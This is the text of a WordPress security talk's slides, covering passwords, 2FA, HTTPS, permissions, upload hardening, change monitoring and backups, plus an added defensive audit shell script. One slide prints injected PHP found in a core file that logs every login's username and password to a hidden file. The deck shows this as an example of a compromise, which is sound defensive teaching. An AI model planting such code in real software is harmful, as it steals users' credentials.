Securing Your WordPress Installation
Security 
How to Secure Your WordPress
About Me 
• WordPress Plugins Developer 
– Since 2003 
– Created > 22 plugins 
• wp-pagenavi, wp-polls, wp-postratings, wp-postviews, wp-dbmanager, 
etc 
• http://profiles.wordpress.org/gamerz 
• Tech Guy in Tech in Asia 
– Just started on 1st September 2014 
– Tech in Asia is still hiring & you can join my team 
• techinasia.com/join 
• PHP & iOS Developer 
Lester Chan (@gamerz) [ 2 ]
WordPress Is Popular 
• Powers 22% of the web 
• Most blogs use WordPress 
– Mashable.com 
– Techcrunch.com 
• Because it is popular, lots of attacks are being 
targeted at WordPress sites 
Lester Chan (@gamerz) [ 3 ]
Hack Attempts 
• wp-includes/users.php 
  – Injected code found in a core file: it appends every login's username and password to a file hidden under wp-content/plugins 
    $fh = fopen(ABSPATH . "core/wp-content/plugins/.htaccess", "a+");
    fwrite($fh, $credentials['user_login'] . ':' . $credentials['user_password'] . "\n");
    fclose($fh);
• Backdoor files 
Lester Chan (@gamerz) [ 4 ]
Security 101 
• Always keep your WordPress & its plugins up to date. 
– 4th September 2014 
• WordPress 4.0 
– 6th August 2014 
• WordPress 3.9.2 was released to fix: 
– Fixes a possible but unlikely code execution when processing 
widgets 
– Prevents information disclosure via XML entity attacks in the 
external GetID3 library 
– Adds protections against brute-force attacks against CSRF tokens 
– Contains some additional security hardening, like preventing 
cross-site scripting that could be triggered only by administrators. 
Lester Chan (@gamerz) [ 5 ]
Passwords 
• Use a complex password 
– In general 
• Not just WordPress but your 
CPanel/FTP as well 
• Use a 2FA plugin 
– Google Authenticator 
• https://wordpress.org/plugins/google-authenticator/ 
– Authy Two Factor Authentication 
• https://wordpress.org/plugins/authy-two-factor-authentication/ 
Lester Chan (@gamerz) [ 6 ]
Passwords 
• Protect your WP-Admin with a password 
– Using htpasswd 
• http://www.htaccesstools.com/htpasswd-generator/ 
– Placing .htaccess in wp-admin 
    ErrorDocument 401 default
    AuthName "Lester Chan's Website WordPress Admin"
    AuthUserFile "/home/gamerz/wp-admin/passwd"
    AuthType Basic
    require valid-user
    <Files admin-ajax.php>
      Order allow,deny
      Allow from all
      Satisfy any
    </Files>
  – The <Files> block exempts admin-ajax.php so front-end AJAX requests keep working without a basic-auth prompt 
Lester Chan (@gamerz) [ 7 ]
HTTPS 
• HTTPS encrypts communication and sensitive 
data between the browser and wp-admin. 
• Prevents man in the middle attacks. 
– define('FORCE_SSL_LOGIN', true); 
– define('FORCE_SSL_ADMIN', true); 
Lester Chan (@gamerz) [ 8 ]
Files/Folder Permissions 
• Files & folders should be writeable only by the owner and readable by everyone else 
• Ensure all files are CHMOD to 644 
  – find . -type f -exec chmod 644 {} \; 
• Ensure all folders are CHMOD to 755 
  – find . -type d -exec chmod 755 {} \; 
Lester Chan (@gamerz) [ 9 ]
WordPress Uploads 
• /wp-content/uploads/ 
– Is a common attack vector because it stores user-uploaded files 
– Harder to notice 
– Most people will just CHMOD this to 777 
• Which means everyone can read & write to it 
– This folder should only serve static assets & not 
execute any scripts 
• http://stackoverflow.com/questions/18932756/disable-all-cgi-php-perl-for-a-directory-using-htaccess 
Lester Chan (@gamerz) [ 10 ]
Monitor Changed Files 
• I monitor my site's changed files via email on a daily basis 
• Using CRON 
– find /home/gamerz/public_html -mtime -1 
Lester Chan (@gamerz) [ 11 ]
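As an added example (not from the deck), the following script automates the checks from the permissions, uploads and monitoring slides above: it reports files that are not 644 and folders that are not 755, flags script files inside wp-content/uploads, lists what changed in the last day, and writes the uploads .htaccess that refuses to serve scripts, which is what the StackOverflow link describes. The install path is passed as an argument (the slides use /home/gamerz/public_html), and the fixture tree at the end is constructed for demonstration.

```shell
#!/bin/sh
# wp-audit.sh: added example (not from the slides). A daily defensive audit of a
# WordPress tree that automates the checks from slides 9-11:
#   audit_perms    files not 644 / folders not 755
#   audit_uploads  script files sitting inside wp-content/uploads
#   audit_changed  files modified in the last N days
# plus harden_uploads, which writes the .htaccess that stops Apache serving
# scripts from uploads. Assumes POSIX sh and find(1); the install path is
# given as an argument (the slides use /home/gamerz/public_html).

# Files whose mode is not 644 and directories whose mode is not 755.
audit_perms() {
    root="$1"
    find "$root" -type f ! -perm 644 -print
    find "$root" -type d ! -perm 755 -print
}

# PHP-like files inside uploads. The folder should only hold static assets,
# so any hit here is worth a look regardless of how it got there.
audit_uploads() {
    up="$1/wp-content/uploads"
    [ -d "$up" ] || return 0
    find "$up" -type f \( -name '*.php' -o -name '*.phtml' \
        -o -name '*.php[0-9]' -o -name '*.phar' \) -print
}

# Files modified within the last $2 days (default 1), skipping the cache
# directory, which churns constantly and would drown the report.
audit_changed() {
    root="$1"; days="${2:-1}"
    find "$root" -path "$root/wp-content/cache" -prune -o \
        -type f -mtime "-$days" -print
}

# Write an uploads .htaccess that refuses to serve script files at all
# (Apache 2.4 syntax with a 2.2 fallback). Static assets are unaffected.
harden_uploads() {
    up="$1/wp-content/uploads"
    mkdir -p "$up"
    cat > "$up/.htaccess" <<'EOF'
# Static assets only: never hand these extensions to PHP or CGI.
<FilesMatch "\.(php|phtml|php[0-9]|phar)$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order deny,allow
        Deny from all
    </IfModule>
</FilesMatch>
EOF
    chmod 644 "$up/.htaccess"
}

# Run every check; print findings and return 1 if there were any, so a cron
# wrapper can mail the output only when something needs attention.
run_audit() {
    root="$1"
    report=$(
        audit_perms "$root"   | sed 's/^/PERM     /'
        audit_uploads "$root" | sed 's/^/UPLOAD   /'
        audit_changed "$root" | sed 's/^/CHANGED  /'
    )
    [ -n "$report" ] || return 0
    printf '%s\n' "$report"
    return 1
}

# Constructed fixture: a tiny fake WordPress tree with one world-writable
# folder (the 777 uploads from slide 10) and one PHP file planted in uploads.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-includes" "$root/wp-content/uploads/2014/09"
    printf '<?php // core file\n' > "$root/wp-includes/users.php"
    printf 'jpegdata\n' > "$root/wp-content/uploads/2014/09/photo.jpg"
    printf '<?php // should not be here\n' > "$root/wp-content/uploads/2014/09/x.php"
    find "$root" -type f -exec chmod 644 {} \;
    find "$root" -type d -exec chmod 755 {} \;
    chmod 777 "$root/wp-content/uploads"
    printf '%s\n' "$root"
}

# Usage from cron, mailing the report only when something was found:
#   sh wp-audit.sh --audit /home/gamerz/public_html || mail -s "wp audit" you@example.com
if [ "${1:-}" = "--audit" ] && [ -d "${2:-}" ]; then
    run_audit "$2"
fi
```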
Using Git 
• /core/ 
– Contains a Git checkout of 
https://github.com/WordPress/WordPress 
– git fetch --tags; git checkout 4.0 
• /content/ 
– It is a Git checkout of my private repository 
– Contains all my active plugins and themes 
• Doing a git status in either folder above also tells me what has changed 
Lester Chan (@gamerz) [ 12 ]
Backup 
• Backup your database regularly 
– Every hour if you blog more than once a day 
– Every day if you blog regularly 
– Using a plugin like WP-DBManager 
• https://wordpress.org/plugins/wp-dbmanager/ 
• Backup your /uploads/ folder 
– Using Git? (not ideal) 
– FTP to S3/Dropbox? 
– NAS 
– Gluster FS 
Lester Chan (@gamerz) [ 13 ]
VaultPress 
• https://vaultpress.com/ 
– By Automattic 
• Company behind WordPress.com 
– Paid 
• Lite (USD$55/year), Basic (USD$165/year), Premium 
(USD$440/year) 
– Features 
• Realtime full (database + files) backup 
• Scanning your site for dangerous files 
• Automatic restore of database + files 
Lester Chan (@gamerz) [ 14 ]
Summary 
• Password Protected WP-Admin 
• Use Google Authenticator as 2FA login for 
WordPress 
• HTTPS for WP-Admin 
• Ensure all files are CHMOD to 644 and folders to 755 
• Do not allow any script execution in /uploads/ 
folder 
• Monitor your site changed files 
• Backup your database regularly 
Lester Chan (@gamerz) [ 15 ]
Other References 
• http://codex.wordpress.org/Hardening_WordPress 
• http://codex.wordpress.org/Backing_Up_Your_WordPress_Files 
• http://wordpress.tv/tag/security/ 
Lester Chan (@gamerz) [ 16 ]
Questions? 
• Any questions? 
• You can also find me at 
– Blog: http://lesterchan.net 
– Twitter: @gamerz 
– Facebook: https://fb.com/lesterchan 
– Instagram: @gamerz 
Lester Chan (@gamerz) [ 17 ]
